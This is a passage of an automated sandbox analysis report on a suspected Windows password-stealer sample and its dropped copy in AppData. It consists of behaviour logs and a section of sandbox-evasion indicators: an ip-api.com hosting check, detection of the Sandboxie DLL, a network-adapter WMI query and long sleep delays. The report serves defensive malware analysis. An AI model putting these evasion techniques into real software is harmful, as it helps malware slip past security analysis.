                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe PID: 5244, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: lnYkIr.exe PID: 7344, type: MEMORYSTR
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000A.00000002.2187787442.000000000441F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3365722284.0000000000429000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeMemory allocated: 1300000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeMemory allocated: 2DD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeMemory allocated: 2C60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeMemory allocated: 8D90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeMemory allocated: 71C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeMemory allocated: 9E90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeMemory allocated: AE90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeMemory allocated: 30D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeMemory allocated: 3230000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeMemory allocated: 5230000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeMemory allocated: 1760000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeMemory allocated: 31E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeMemory allocated: 51E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeMemory allocated: 8BF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeMemory allocated: 9BF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeMemory allocated: 8BF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeMemory allocated: 1330000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeMemory allocated: 2BE0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeMemory allocated: 29A0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5931Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5307Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeWindow / User API: threadDelayed 4403Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeWindow / User API: threadDelayed 4634Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeWindow / User API: threadDelayed 4938
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeWindow / User API: threadDelayed 931
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 2940Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7320Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7264Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -23058430092136925s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7520Thread sleep count: 4403 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -99875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -99745s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -99638s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7520Thread sleep count: 4634 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -99531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -99418s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -99311s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -99203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -99093s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -98984s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -98874s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -98765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -98642s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -98500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -98389s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -98281s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -98171s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -98062s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -97952s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -97843s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -97734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -97624s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -97500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -97390s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -97280s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -97171s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -97062s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -96952s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -96843s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -96734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -96624s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -96499s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -96324s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -96218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -96109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -96000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -95890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -95781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -95671s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -95562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -95453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -95343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -95234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -95125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -95015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7512Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -10145709240540247s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -99891s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7828Thread sleep count: 4938 > 30
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7828Thread sleep count: 931 > 30
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -99782s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -99657s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -99532s >= -30000s
